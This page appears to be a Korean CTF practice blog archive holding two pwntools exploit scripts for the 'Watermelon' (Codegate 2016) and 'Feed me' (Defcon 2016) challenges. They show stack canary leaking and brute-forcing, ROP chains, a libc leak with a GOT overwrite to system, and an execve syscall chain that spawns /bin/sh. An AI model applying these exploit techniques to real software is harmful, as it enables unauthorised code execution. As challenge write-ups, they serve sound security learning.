'2019/07/29'에 해당되는 글 2건

Codegate 2016 CTF Watermelon

System/Pwnable Practice 2019. 7. 29. 20:34
exploit.py


from pwn import *
  
p = process("./vuln")
e = ELF("./vuln")
l = e.libc

print p.recvuntil("\n")
p.sendline("youngsin")
for i in range(1,100):
    print p.sendlineafter("\tselect\t|\t\n","1")
    print p.sendlineafter("music\t|\t","A")
    print p.sendlineafter("\tartist\t|\t","B")

for i in range(99,101):
    print p.sendlineafter("\tselect\t|\t\n","3")
    print p.sendlineafter("select number\t|\t\n",str(i))
    print p.sendlineafter("music\t|\t","A"*19)

    if i==100:
        print p.sendafter("artist\t|\t","F"*16+"12345")
    else:
        print p.sendlineafter("artist\t|\t","B"*24)

print p.sendlineafter("\tselect\t|\t\n","2")
print p.recvuntil("12345")

canary = "\x00"+p.recv(3)
pppr = 0x080495ad
binsh = "/bin/sh\x00"

payload = "A"*20
payload += canary
payload += "A"*12

payload += p32(e.plt['write'])
payload += p32(pppr)
payload += p32(1)
payload += p32(e.got['read'])
payload += p32(4)

payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.bss())
payload += p32(len(binsh))

payload += p32(e.plt['read'])
payload += p32(pppr)
payload += p32(0)
payload += p32(e.got['read'])
payload += p32(4)

payload += p32(e.plt['read'])
payload += "A"*4
payload += p32(e.bss())

print p.sendlineafter("\tselect\t|\t\n","3")
print p.sendlineafter("select number\t|\t\n","100")
print p.sendlineafter("music\t|\t","A"*19)
print p.sendafter("artist\t|\t",payload)
print p.sendlineafter("\tselect\t|\t\n","4")
print p.recvuntil("BYE\n\n")


read_addr = u32(p.recv(4).ljust(4,"\x00"))
libc_base = read_addr - l.symbols['read']
system_addr = libc_base + l.symbols['system']

p.send(binsh)
p.sendline(p32(system_addr))
p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

Hitcon CTF 2017 start  (0) 2019.07.30
Codegate 2019 CTF aeiou  (0) 2019.07.30
Defcon CTF 2016 Feed me  (0) 2019.07.29
SECCON CTF 2018 Classic  (0) 2019.07.28
Defcon CTF 2015 r0pbaby  (0) 2019.07.28
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

Defcon CTF 2016 Feed me

System/Pwnable Practice 2019. 7. 29. 00:21

exploit.py


from pwn import *
  
p = process("./feedme")

e = ELF("./feedme")

canary = ""
p.recvuntil("FEED ME!\n")
for j in range(0,4):
    for i in range(0,256):
        payload = "A"*0x20+canary+chr(i)
        p.send(chr(len(payload)))
        p.send(payload)
        result = p.recvuntil("FEED ME!\n")
        if not "stack smashing detected" in result:
            canary += chr(i)
            print canary
            break

print "Find Canary = " + canary

syscall = 0x0806fa1e
par = 0x080bb496
pcpbr = 0x0806f371
pdr = 0x0806f34a
bss = e.bss()
binsh = "/bin/sh\x00"


payload = "A"*0x20
payload += canary
payload += "A"*12
payload += p32(par)
payload += p32(0x3)
payload += p32(pcpbr)
payload += p32(bss)
payload += p32(0)
payload += p32(pdr)
payload += p32(len(binsh))
payload += p32(syscall)

payload += p32(par)
payload += p32(0xb)
payload += p32(pcpbr)
payload += p32(0)
payload += p32(bss)
payload += p32(pdr)
payload += p32(0)
payload += p32(syscall)


p.send(chr(len(payload)))
p.send(payload)
sleep(0.1)
p.send(binsh)
p.interactive()


'System > Pwnable Practice' 카테고리의 다른 글

Codegate 2019 CTF aeiou  (0) 2019.07.30
Codegate 2016 CTF Watermelon  (0) 2019.07.29
SECCON CTF 2018 Classic  (0) 2019.07.28
Defcon CTF 2015 r0pbaby  (0) 2019.07.28
Pico CTF 2018 Can you gets me  (0) 2019.07.28
블로그 이미지

JeonYoungSin

메모 기록용 공간

,

공지사항

글 보관함

달력

«   2019/07   »
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31

티스토리툴바